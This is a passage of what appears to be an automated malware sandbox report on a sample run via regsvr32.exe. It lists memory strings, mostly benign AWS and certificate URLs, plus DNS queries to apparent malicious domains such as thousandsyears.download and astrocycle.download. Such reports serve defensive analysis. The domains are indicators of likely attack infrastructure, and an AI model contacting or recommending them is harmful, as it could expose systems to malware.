https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: thousandsyears.download

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 14:11:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=KHvsB4UastSDyZ00PSPKxxS257tJApreatajf3XyPgQVVR8oT0ZDPuDi4tk1YZCR5yP3ASMe48hf4p4KhxKzBpbPn%2F8L%2Bv47%2FRskLTe8o2DAZTOP9mECsTR7xqcpkWW9bg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a96c14ec014a61-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>

Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp	String found in binary or memory: http://astrocycle.download/
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootg2.amazontrust.com/root.
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
Source: regsvr32.exe, 00000004.00000002.2089523465.00000000031E0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000004.00000002.2089523465.00000000031E0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000004.00000002.2090763464.00000000033C7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000004.00000002.2090763464.00000000033C7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://o.ss2.us/0
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.rootg2.amazontrust.com08
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.sca1b.amazontrust.com06
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://s.ss2.us/r.crl0
Source: regsvr32.exe, 00000004.00000002.2088126688.0000000002DF0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2079767199.0000000001D30000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2087094805.0000000001CA0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2087728118.0000000001D60000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.2090763464.00000000033C7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000004.00000002.2090763464.00000000033C7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2088126688.0000000002DF0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000004.00000002.2089523465.00000000031E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000004.00000002.2090763464.00000000033C7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000004.00000002.2089523465.00000000031E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2089523465.00000000031E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: http://x.ss2.us/x.cer0&
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://112-tzm-766.mktoresp.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://112-tzm-766.mktoutil.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/psf/null
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com;
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a0.p.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://a1.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2087012759.00000000002B7000.00000004.00000020.sdmp	String found in binary or memory: https://amazon.com/
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://amazonwebservices.d2.sc.omtrdc.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://anchor.fm
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://api.regional-table.region-services.aws.a2z.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://api.us-west-2.prod.pricing.aws.a2z.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws-quickstart.s3.amazonaws.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/?nc2=h_lg
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ar/
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/cn/
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/de/
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/es/
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/fr/
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/id/
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/it/
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/jp/
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ko/
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/pt/
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ru/
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search/
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search/?searchQuery=
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/th/
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tr/
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp	String found in binary or memory: https://aws.amazon.com/tr/?nc1=h_
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tw/
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/vi/
Source: regsvr32.exe, 00000004.00000002.2086995529.0000000000297000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://awsmedia.s3.amazonaws.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://b0.p.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://c0.b0.p.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://calculator.aws
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://chtbl.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/console/home
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&src=footer-signin-mobile
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d0.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d1.awsstatic-china.com
Source: regsvr32.exe, 00000004.00000002.2088064494.00000000028C0000.00000004.00000001.sdmp	String found in binary or memory: https://d1.awsstatic.com
